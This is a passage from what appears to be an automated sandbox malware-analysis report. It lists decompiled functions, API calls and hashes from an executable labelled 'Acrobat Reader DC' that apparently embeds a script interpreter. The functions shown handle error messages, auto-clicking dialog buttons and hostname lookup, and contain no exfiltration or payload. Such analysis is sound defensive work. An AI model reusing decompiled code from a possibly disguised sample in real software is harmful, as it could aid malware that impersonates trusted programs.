								_t9 =  &_v152; // -148
								__ecx = _t9;
								__eax = E0041329B(__edx, _t9, L"0x%p",  *__ebx);
								goto L18;
							case 5:
								__eflags =  *__ebx;
								if( *__ebx == 0) {
									_t11 =  &_v152; // -148
									_t11 = E00411567(_t11, L"False");
								} else {
									_t10 =  &_v152; // -148
									__edx = _t10;
									__eax = E00411567(_t10, L"True");
								}
								goto L18;
							case 6:
								__edx =  *__ebx;
								_t12 =  &_v20; // -16
								__ecx = _t12;
								E0044B3F6( *__ebx, _t12) =  *__eax;
								_t13 =  &_v152; // -148
								__ecx = _t13;
								__eax = E00411567(_t13, __eax);
								_t14 =  &_v20; // -16
								__ecx = _t14;
								__eax = E00402250(_t14);
								L18:
								E00403D80(_t38);
								_push(0x10);
								_t33 = E004115D7(_t41, _t38, _t53);
								_t54 = _t33;
								if(_t33 == 0) {
									__eflags = 0;
									 *((intOrPtr*)(_t38 + 0xc)) = 0;
									return 0;
								}
								_t35 = E00401B10( &_v152, _t33, _t54);
								 *((intOrPtr*)(_t38 + 0xc)) = _t35;
								return _t35;
								goto L22;
							case 7:
								__edx =  *__ebx;
								__esi =  *( *__ebx);
								__ecx = 0;
								__eax = 6 + __esi * 4;
								2 = __eax * 2 >> 0x20;
								__eax = __eax * 2;
								0 | __eflags > 0x00000000 =  ~(__eflags > 0);
								__ecx =  ~(__eflags > 0) | __eax;
								_push( ~(__eflags > 0) | __eax);
								__edi = E004115D7(__edi, __esi, __eflags);
								__eax =  *__ebx;
								__esp = __esp + 4;
								__eflags =  *__eax;
								if( *__eax == 0) {
									__eax = 0;
									__eflags = 0;
									 *__edi = __ax;
								} else {
									__ecx =  *__eax;
									__edx =  *(__eax + 4);
									__eax = E00432DFC( *(__eax + 4), __edi,  *__eax);
								}
								__esi = __ebx;
								__eax = E00403D80(__esi);
								_push(0x10);
								__eax = E004115D7(__edi, __esi, __eflags);
								__esp = __esp + 4;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__eflags = 0;
									_push(__edi);
									 *(__ebx + 0xc) = 0;
									__eax = E004111DC();
									__esp = __esp + 4;
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__esi = __eax;
									__eax = E00401B10(__edi, __eax, __eflags);
									_push(__edi);
									 *(__ebx + 0xc) = __eax;
									__eax = E004111DC();
									__esp = __esp + 4;
									_pop(__edi);
									_pop(__esi);
									return __eax;
								}
								goto L22;
						}
					}
				}
				L22:
			}








                                  0x004531bb
                                  0x004531be
                                  0x004531c4
                                  0x00453380
                                  0x004531ca
                                  0x004531ca
                                  0x004531d0
                                  0x0045333e
                                  0x00453340
                                  0x00000000
                                  0x004531d6
                                  0x004531d6
                                  0x00000000
                                  0x004531e9
                                  0x004531ee
                                  0x00000000
                                  0x00000000
                                  0x004531f6
                                  0x004531f9
                                  0x004531fd
                                  0x004531fd
                                  0x00453206
                                  0x00000000
                                  0x00000000
                                  0x00453215
                                  0x00453218
                                  0x0045321b
                                  0x0045321b
                                  0x00453221
                                  0x00453226
                                  0x00453227
                                  0x0045322c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00453234
                                  0x00453237
                                  0x00453237
                                  0x00453243
                                  0x00000000
                                  0x00000000
                                  0x00453250
                                  0x00453253
                                  0x0045326e
                                  0x0045327a
                                  0x00453255
                                  0x00453255
                                  0x00453255
                                  0x00453261
                                  0x00453266
                                  0x00000000
                                  0x00000000
                                  0x00453287
                                  0x00453289
                                  0x00453289
                                  0x00453293
                                  0x00453296
                                  0x00453296
                                  0x0045329d
                                  0x004532a5
                                  0x004532a5
                                  0x004532a8
                                  0x00453347
                                  0x00453349
                                  0x0045334e
                                  0x00453350
                                  0x00453358
                                  0x0045335a
                                  0x00453375
                                  0x00453378
                                  0x00000000
                                  0x0045337b
                                  0x00453364
                                  0x0045336b
                                  0x00453372
                                  0x00000000
                                  0x00000000
                                  0x004532b2
                                  0x004532b4
                                  0x004532b6
                                  0x004532b8
                                  0x004532c4
                                  0x004532c4
                                  0x004532c9
                                  0x004532cb
                                  0x004532cd
                                  0x004532d3
                                  0x004532d5
                                  0x004532d7
                                  0x004532da
                                  0x004532dd
                                  0x004532f1
                                  0x004532f1
                                  0x004532f3
                                  0x004532df
                                  0x004532df
                                  0x004532e1
                                  0x004532e7
                                  0x004532ec
                                  0x004532f6
                                  0x004532f8
                                  0x004532fd
                                  0x004532ff
                                  0x00453304
                                  0x00453307
                                  0x00453309
                                  0x00453327
                                  0x00453327
                                  0x00453329
                                  0x0045332a
                                  0x0045332d
                                  0x00453332
                                  0x00453335
                                  0x00453336
                                  0x0045333b
                                  0x0045330b
                                  0x0045330b
                                  0x0045330d
                                  0x00453312
                                  0x00453313
                                  0x00453316
                                  0x0045331b
                                  0x0045331e
                                  0x0045331f
                                  0x00453324
                                  0x00453324
                                  0x00000000
                                  0x00000000
                                  0x004531d6
                                  0x004531d0
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                  • String ID: %.15g$0x%p$False$True
                                  • API String ID: 3038501623-2263619337
                                  • Opcode ID: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                  • Opcode Fuzzy Hash: 9e50b87208696871976aec561e59ab744ba77687bdac14840efb02e890edfc0f
                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0045E538(void* __fp0, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v64;
				WCHAR* _v80;
				short _v8276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t48;
				WCHAR* _t57;
				intOrPtr _t92;
				WCHAR* _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr _t122;
				struct HINSTANCE__* _t123;
				void* _t136;

				_t136 = __fp0;
				_t48 = E00422240(0x2054);
				if( *0x4974e2 == 0) {
					_t48 = _a4;
					_t129 =  *((intOrPtr*)(_t48 + 0xf8)) - 1;
					if( *((intOrPtr*)(_t48 + 0xf8)) != 1) {
						LoadStringW( *0x497520, 0x66,  &_v8276, 0xfff);
						_t110 =  &_v8276;
						E00401B10(_t110,  &_v80, _t129);
						_t95 =  *0x497520;
						LoadStringW( *0x497520, 0x72, _t110, 0xfff);
						E00401B10(_t110,  &_v64, _t129);
						_t105 = _a4;
						_t120 =  *((intOrPtr*)(_a4 + 0xf4));
						_v8 = E004348DE(_t120);
						_t111 = E004348AA(_t120);
						_v28 = _t111;
						_t92 = E00434908(E0043492F(_t120));
						_v32 = _t92;
						_t57 =  &_v8276;
						_t130 = _t92;
						if(_t92 == 0) {
							_t95 = _a4;
							_t105 =  *((intOrPtr*)(_t95 + 0xc8));
							_push( *((intOrPtr*)(_t95 + 0xc8)));
							_push(_t120);
						} else {
							_push(_t92);
							_push(_t111);
						}
						_push(L"Line %d  (File \"%s\"):\n\n");
						_push(_t57);
						E0041329B(_t105);
						E00401B10( &_v8276,  &_v24, _t130);
						_t122 = _v8;
						_t131 = _t122;
						if(_t122 != 0) {
							E0040D200( &_v24, _t95, _t122, _t136);
							E0040D200( &_v24, _t95, "\n", _t136);
						}
						_t96 =  &_v48;
						E0040BC70( &_v48, _t131);
						_t113 = _a8;
						if(_a8 != 0) {
							E00402160( &_v48, L"^ ERROR ", _t105, _t113);
							E0040D200( &_v48,  &_v48, _t113, _t136);
							_t96 =  &_v48;
							E0040BD50( &_v24, _t136,  &_v48);
							E0040D200( &_v24,  &_v48, "\n", _t136);
							_t92 = _v32;
						}
						E0040D200( &_v24, _t96, L"\nError: ", _t136);
						E0040BD50( &_v24, _t136,  &_v64);
						if( *0x4974e8 == 0) {
							MessageBoxW( *0x497518, _v24, _v80, 0x11010);
							goto L14;
						} else {
							_t134 = _t92;
							if(_t92 == 0) {
								_t123 = _a4;
								_push(_v64);
								_push( *((intOrPtr*)(_t123 + 0xf4)));
								_push( *((intOrPtr*)(_t123 + 0xc8)));
								_push(L"%s (%d) : ==> %s:\n");
								E00413ABE(_t92,  *((intOrPtr*)(_t123 + 0xc8)), L"\nError: ", _t123, __eflags);
								L15:
								asm("sbb eax, eax");
								 *((intOrPtr*)(_t123 + 0xf8)) = 1;
								 *0x4974f4 = ( ~( *(_t123 + 0x118) & 0x000000ff) & 0x7ffff071) + 1;
								E00402250( &_v48);
								E00402250( &_v24);
								E00402250( &_v64);
								return E00402250( &_v80);
							}
							_push(_v48);
							_push(_t122);
							_push(_v64);
							_push(_v28);
							_push(_t92);
							_push(L"%s (%d) : ==> %s:\n%s\n%s\n");
							E00413ABE(_t92, _v28, L"\nError: ", _t122, _t134);
							L14:
							_t123 = _a4;
							goto L15;
						}
					}
				}
				return _t48;
			}
























                                  0x0045e538
                                  0x0045e540
                                  0x0045e54f
                                  0x0045e555
                                  0x0045e558
                                  0x0045e55f
                                  0x0045e580
                                  0x0045e582
                                  0x0045e58b
                                  0x0045e590
                                  0x0045e59f
                                  0x0045e5a4
                                  0x0045e5a9
                                  0x0045e5ac
                                  0x0045e5b9
                                  0x0045e5c1
                                  0x0045e5c4
                                  0x0045e5d2
                                  0x0045e5d4
                                  0x0045e5d7
                                  0x0045e5dd
                                  0x0045e5df
                                  0x0045e5e5
                                  0x0045e5e8
                                  0x0045e5ee
                                  0x0045e5ef
                                  0x0045e5e1
                                  0x0045e5e1
                                  0x0045e5e2
                                  0x0045e5e2
                                  0x0045e5f0
                                  0x0045e5f5
                                  0x0045e5f6
                                  0x0045e607
                                  0x0045e60c
                                  0x0045e60f
                                  0x0045e611
                                  0x0045e618
                                  0x0045e625
                                  0x0045e625
                                  0x0045e62a
                                  0x0045e62d
                                  0x0045e632
                                  0x0045e637
                                  0x0045e641
                                  0x0045e649
                                  0x0045e64e
                                  0x0045e655
                                  0x0045e662
                                  0x0045e667
                                  0x0045e667
                                  0x0045e672
                                  0x0045e67e
                                  0x0045e68a
                                  0x0045e6e5
                                  0x00000000
                                  0x0045e68c
                                  0x0045e68c
                                  0x0045e68e
                                  0x0045e6b0
                                  0x0045e6bf
                                  0x0045e6c0
                                  0x0045e6c1
                                  0x0045e6c2
                                  0x0045e6c7
                                  0x0045e6ee
                                  0x0045e6f7
                                  0x0045e702
                                  0x0045e70c
                                  0x0045e711
                                  0x0045e719
                                  0x0045e721
                                  0x00000000
                                  0x0045e729
                                  0x0045e699
                                  0x0045e69a
                                  0x0045e69b
                                  0x0045e69c
                                  0x0045e69d
                                  0x0045e69e
                                  0x0045e6a3
                                  0x0045e6eb
                                  0x0045e6eb
                                  0x00000000
                                  0x0045e6eb
                                  0x0045e68a
                                  0x0045e55f
                                  0x0045e734

                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                  • __swprintf.LIBCMT ref: 0045E5F6
                                  • _wprintf.LIBCMT ref: 0045E6A3
                                  • _wprintf.LIBCMT ref: 0045E6C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-8599901
                                  • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                  • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                  • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00443B61(void* __edx, long* _a4) {
				void* __esi;
				void* _t5;
				struct HWND__* _t8;
				struct HWND__* _t9;
				struct HWND__* _t12;
				struct HWND__* _t18;
				long* _t22;
				struct HWND__* _t24;
				void* _t25;
				struct HWND__* _t26;
				struct HWND__* _t27;
				long _t28;
				long _t29;
				struct HWND__* _t30;
				void* _t35;

				_t25 = __edx;
				_t29 = timeGetTime();
				if( *0x4974ef == 0) {
					L12:
					return 0;
				} else {
					_t22 = _a4;
					while(1) {
						_t5 = E0040C620(_t29);
						_t28 = _t22[1];
						_t35 = _t25;
						if(_t35 > 0 || _t35 >= 0 && _t5 >= _t28) {
							break;
						}
						Sleep(0xa);
						if( *0x4974ef != 0) {
							continue;
						} else {
							return 0;
						}
						goto L13;
					}
					 *0x4a7538 = 0;
					EnumThreadWindows( *_t22, E00433D09, 0);
					_t8 =  *0x4a7538; // 0x0
					if(_t8 != 0) {
						 *0x4974ee = 1;
						_t9 = FindWindowExW(_t8, 0, L"BUTTON", 0);
						_t24 =  *0x4a7538; // 0x0
						_t30 = _t9;
						if(_t30 == 0) {
							SendMessageW(_t24, 0x10, 0, 0);
							Sleep(0xfa);
							_t26 =  *0x4a7538; // 0x0
							if(IsWindow(_t26) == 0) {
								goto L12;
							} else {
								_t12 =  *0x4a7538; // 0x0
								EndDialog(_t12, 0);
								return 0;
							}
						} else {
							E004439C1(_t24, 1);
							_t27 =  *0x4a7538; // 0x0
							SetActiveWindow(_t27);
							SendMessageW(_t30, 0xf5, 0, 0);
							_t18 =  *0x4a7538; // 0x0
							E004439C1(_t18, 0);
							return 0;
						}
					} else {
						goto L12;
					}
				}
				L13:
			}


















                                  0x00443b61
                                  0x00443b74
                                  0x00443b76
                                  0x00443c80
                                  0x00443c84
                                  0x00443b7c
                                  0x00443b7c
                                  0x00443b81
                                  0x00443b81
                                  0x00443b86
                                  0x00443b8b
                                  0x00443b8d
                                  0x00000000
                                  0x00000000
                                  0x00443b9f
                                  0x00443bac
                                  0x00000000
                                  0x00443bb0
                                  0x00443bb4
                                  0x00443bb4
                                  0x00000000
                                  0x00443bac
                                  0x00443c65
                                  0x00443c6b
                                  0x00443c71
                                  0x00443c78
                                  0x00443bc1
                                  0x00443bc8
                                  0x00443bce
                                  0x00443bd4
                                  0x00443bd8
                                  0x00443c22
                                  0x00443c2d
                                  0x00443c33
                                  0x00443c42
                                  0x00000000
                                  0x00443c44
                                  0x00443c44
                                  0x00443c4c
                                  0x00443c58
                                  0x00443c58
                                  0x00443bda
                                  0x00443bdd
                                  0x00443be2
                                  0x00443bec
                                  0x00443bfc
                                  0x00443c02
                                  0x00443c0a
                                  0x00443c18
                                  0x00443c18
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00443c78
                                  0x00000000

                                  APIs
                                  • timeGetTime.WINMM ref: 00443B67
                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                  • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                  • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                  • IsWindow.USER32(00000000), ref: 00443C3A
                                  • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                  • String ID: BUTTON
                                  • API String ID: 1834419854-3405671355
                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E00454014(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _v24;
				WCHAR* _v40;
				short _v8232;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t49;
				void* _t56;
				void* _t73;
				void* _t75;

				_t75 = __fp0;
				_t73 = __eflags;
				E00422240(0x2028);
				_t49 = _a4;
				_t50 =  *(_t49 + 0x48);
				LoadStringW(GetModuleHandleW(0),  *(_t49 + 0x48),  &_v8232, 0xfff);
				_t67 =  &_v40;
				E00401B10( &_v8232,  &_v40, _t73);
				_t74 =  *((char*)(_t49 + 3));
				if( *((char*)(_t49 + 3)) == 0) {
					_t29 = _a8;
					__eflags = _t29;
					if(_t29 != 0) {
						_push(_t29);
						E0041329B(_a12,  &_v8232, L"Line %d  (File \"%s\"):\n\n", _a12);
					} else {
						_t50 =  &_v8232;
						E0041329B(_t56,  &_v8232, L"Line %d:\n\n", _a12);
					}
					_t68 =  &_v24;
					E00401B10( &_v8232,  &_v24, __eflags);
					E0040D200( &_v24, _t50, _a20, _t75);
					E0040D200(_t68, _t50, L"\n\nError: ", _t75);
					E0040D200(_t68, _t50, _a16, _t75);
					E0040D200(_t68, _t50, L".\n\n", _t75);
					MessageBoxW(0, _v24, _v40, 0x11010);
					E00402250(_t68);
					return E00402250( &_v40);
				} else {
					_push(0x484ea8);
					_push(_a20);
					_push(_a16);
					_push(_a12);
					_push(_a8);
					_push(L"%s (%d) : ==> %s.: \n%s \n%s\n");
					E00413ABE(_t49, _a8,  &_v8232,  &_v40, _t74);
					return E00402250(_t67);
				}
			}















                                  0x00454014
                                  0x00454014
                                  0x0045401c
                                  0x00454022
                                  0x00454025
                                  0x00454040
                                  0x0045404c
                                  0x0045404f
                                  0x00454054
                                  0x00454058
                                  0x0045408c
                                  0x0045408f
                                  0x00454091
                                  0x004540b0
                                  0x004540be
                                  0x00454093
                                  0x00454097
                                  0x004540a3
                                  0x004540a8
                                  0x004540cc
                                  0x004540cf
                                  0x004540d9
                                  0x004540e5
                                  0x004540ef
                                  0x004540fb
                                  0x0045410f
                                  0x00454117
                                  0x0045412a
                                  0x0045405a
                                  0x00454063
                                  0x00454068
                                  0x0045406c
                                  0x0045406d
                                  0x0045406e
                                  0x0045406f
                                  0x00454074
                                  0x00454089
                                  0x00454089

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                  • LoadStringW.USER32(00000000), ref: 00454040
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • _wprintf.LIBCMT ref: 00454074
                                  • __swprintf.LIBCMT ref: 004540A3
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                  • API String ID: 455036304-4153970271
                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433493 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 84networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E00433493(signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v268;
				char _v668;
				char* _t14;
				int _t16;
				intOrPtr* _t17;
				void* _t19;
				void* _t24;
				void* _t25;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr _t33;
				signed int _t34;
				void* _t35;

				_t34 = _a4;
				_t33 = _a8;
				_t14 =  &_v668;
				__imp__#115(0x101, _t14);
				if(_t14 != 0) {
					L8:
					return E00411567(_t33, 0x484ea8);
				} else {
					_t16 = gethostname( &_v268, 0x100);
					__imp__#52( &_v268);
					if(_t16 == 0) {
						goto L8;
					} else {
						_t17 =  *((intOrPtr*)(_t16 + 0xc));
						_t31 = 0;
						if( *_t17 != 0) {
							_t29 = _t17;
							do {
								_t29 = _t29 + 4;
								_t31 = _t31 + 1;
							} while ( *_t29 != 0);
						}
						if(_t34 <= _t31) {
							_t19 = E00410E60( &_v8,  *((intOrPtr*)(_t17 + _t34 * 4 - 4)), 4);
							__imp__#11(_v8);
							E00413650( &_v268, _t19);
							_t35 = E0043299A( &_v268, 0xffffffff);
							E00411567(_t33, _t35);
							_t24 = E004111DC();
							__imp__#116(_t35);
							return _t24;
						} else {
							_t25 = E00411567(_t33, L"0.0.0.0");
							__imp__#116();
							return _t25;
						}
					}
				}
			}

















                                  0x0043349d
                                  0x004334a1
                                  0x004334a4
                                  0x004334b0
                                  0x004334b8
                                  0x00433570
                                  0x00433583
                                  0x004334be
                                  0x004334ca
                                  0x004334d7
                                  0x004334df
                                  0x00000000
                                  0x004334e5
                                  0x004334e5
                                  0x004334e8
                                  0x004334ec
                                  0x004334ee
                                  0x004334f3
                                  0x004334f3
                                  0x004334f6
                                  0x004334f7
                                  0x004334f3
                                  0x004334fe
                                  0x00433525
                                  0x00433531
                                  0x0043353f
                                  0x00433552
                                  0x00433556
                                  0x0043355c
                                  0x00433564
                                  0x0043356f
                                  0x00433500
                                  0x00433506
                                  0x0043350e
                                  0x00433519
                                  0x00433519
                                  0x004334fe
                                  0x004334df

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$Cleanup$Startup_memmovegethostbynamegethostnameinet_ntoa
                                  • String ID: 0.0.0.0
                                  • API String ID: 3306283345-3771769585
                                  • Opcode ID: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                  • Opcode Fuzzy Hash: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 29%
                                  			E00467C8E(intOrPtr* _a4, signed short* _a8) {
				char _v8;
				signed short* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v36;
				signed short _v44;
				void* __edi;
				void* __esi;
				signed int _t100;
				intOrPtr _t105;
				signed int _t109;
				signed int _t110;
				signed int _t113;
				void* _t120;
				signed int _t135;
				signed int _t139;
				signed int _t146;
				signed short* _t154;
				void* _t155;
				signed int _t157;
				signed short _t161;
				signed int _t183;
